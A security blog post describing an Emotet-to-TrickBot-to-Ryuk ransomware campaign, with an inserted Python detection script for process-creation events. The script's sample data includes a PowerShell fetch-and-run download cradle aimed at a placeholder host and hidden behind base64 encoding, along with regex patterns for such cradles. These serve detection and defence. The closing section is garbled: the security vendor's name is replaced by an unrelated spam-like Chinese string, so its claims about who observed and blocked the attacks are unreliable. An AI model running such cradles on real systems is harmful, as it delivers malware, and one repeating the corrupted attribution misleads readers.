Attack Campaign Using Emotet and TrickBot to Deliver Ryuk Ransomware


An attack campaign is using both the Emotet and TrickBot trojan families to infect unsuspecting users with Ryuk ransomware.

Cybereason's research team observed that the campaign begins when a user receives a phishing email carrying a weaponized Microsoft Office document as an attachment. When the user opens the document, it prompts them to enable macros. If they do, the macro executes a PowerShell command that attempts to download Emotet from a malicious domain.

Some Background Info on Emotet

Active since at least 2014, the Emotet trojan is known for targeting users' banking credentials. But its authors have outfitted Emotet with new techniques over the past few years. Those tactics have included embedding macros inside XML files disguised as Word documents to increase the likelihood of infection, as other researchers have noted, and optimizing their spam campaigns by checking whether an infected machine's IP address is already on spam blacklists before sending malicious email from it, as others have observed.

There have been even more dramatic changes as well. Perhaps the most significant is that Emotet has acquired the ability to load additional malware, as documented in an extensive report on the trojan. This same functionality informed the decision of the Cybersecurity and Infrastructure Security Agency (CISA) to label Emotet as "among the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors."

Back to the Attack…

It's therefore no wonder that Emotet behaves as a dropper in the campaign observed by Cybereason. As its researchers explain:

When the Emotet payload executes, it looks to continue its malicious activity by further infecting and gathering information on the affected machine. It initiates the download and execution of the TrickBot trojan by communicating with and downloading from a pre-configured and remote malicious host.

The successful installation of TrickBot marks the second phase of this sophisticated attack campaign. Once it executes on an infected machine, TrickBot creates a scheduled task and a service to achieve persistence. It then reflectively injects its malicious modules into legitimate processes such as svchost to avoid detection. One of these modules, module.dll, is capable of stealing data such as cookies and visited URLs from browsers. Another of its components, vncsrv.dll, lets the attackers view and control the victim's desktop without the victim noticing.

For the purposes of this campaign, one of TrickBot's most important modules is systemInfo.dll. The trojan uses this module to collect information about the machine, which the attackers use to determine whether it belongs to an organization in an industry of interest to them. If it does, the attackers install an additional payload and use it to move laterally within the network toward assets of interest. They then use ping.exe and mstsc.exe (the RDP client) to test connectivity to those assets; if the test succeeds, they begin spreading Ryuk ransomware throughout the network.
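The chain above (macro-launched PowerShell fetching Emotet, TrickBot persisting via a scheduled task and a service, and operators reaching assets over RDP) maps onto a handful of process-creation checks. The following is an added example, not code from the article, Cybereason, or any vendor mentioned here: a small detection pass in Python over constructed Sysmon-style process-creation events (Event ID 1 field names Image, ParentImage and CommandLine). The download-cradle tokens, the script-host list and the sample events are illustrative assumptions, and the example also decodes PowerShell's -EncodedCommand payload so a cradle hidden behind base64 is still caught; it is not a signature for this specific campaign.

```python
"""Added example (not from the article, Cybereason, or any named vendor): a
small detection pass over constructed Sysmon-style process-creation events
(Event ID 1 field names: Image, ParentImage, CommandLine) that flags the
stages of the Emotet -> TrickBot -> Ryuk chain. The regexes are illustrative
assumptions, not a signature for this campaign."""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# PowerShell download-cradle tokens (assumed representative, not exhaustive)
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
    re.I,
)
# -EncodedCommand and its abbreviations, longest alternative first so "-enc"
# is not swallowed by "-e"
ENCODED = re.compile(r"-(?:encodedcommand|enc|en|e)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the list of findings for one process-creation event."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    # Inspect the decoded payload when -enc is used; otherwise the raw line
    effective = decode_encoded_command(cmd) or cmd
    findings = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append("office_spawned_script_host")  # macro -> PowerShell
    if image == "powershell.exe" and CRADLE.search(effective):
        findings.append("powershell_download_cradle")  # fetches the dropper
    if image == "schtasks.exe" and "/create" in cmd.lower():
        findings.append("scheduled_task_created")  # TrickBot persistence
    if image == "sc.exe" and re.search(r"\bcreate\b", cmd, re.I):
        findings.append("service_created")  # TrickBot persistence
    if image == "mstsc.exe":
        findings.append("rdp_client_launched")  # lateral movement over RDP
    return findings


def scan(events):
    """Map event index -> findings for every event that triggered a rule."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}


# Constructed sample telemetry (not real logs); hostnames and paths are made up
CRADLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENC = base64.b64encode(CRADLE_CMD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -w hidden -enc {ENC}"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"ParentImage": r"C:\Users\Public\tb.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn "Update" /tr C:\Users\Public\tb.exe /sc minute /mo 10'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mstsc.exe",
     "CommandLine": "mstsc.exe /v:10.0.0.5"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Temp"},
]

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_EVENTS).items():
        print(i, basename(SAMPLE_EVENTS[i]["Image"]), findings)
```

Run stand-alone, the script flags the Word-spawned encoded PowerShell (two findings), the scheduled-task creation and the RDP client launch, and stays silent on the benign svchost and interactive PowerShell events. In practice these checks belong in a SIEM or EDR rule set and need tuning for legitimate admin activity, since schtasks.exe and mstsc.exe are common in normal operations; the value of the office-to-script-host and encoded-cradle rules is that they are rarely benign.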

Emotet Everywhere

Cybereason isn't the only security firm that has recently spotted a surge of Emotet infections. Between 11 March and 15 March, 秋葵视频色 observed four Emotet attack waves using malicious .doc files, fake UPS invoices, fake personalized invoices and malicious PDFs to lure in users. The attackers likely thought they could evade detection by varying the delivery method.

But they were wrong. Despite the attackers' best efforts, 秋葵视频色Protect blocked all of the samples by filtering out the emails based on their phrases, IPs and patterns. Some of these filters date back as far as November 2017.

Email security is no joke when campaigns such as the one described above are targeting important business assets. That's why organizations should choose an email security solution that analyzes messages on multiple levels while still allowing legitimate correspondence to reach its recipients.
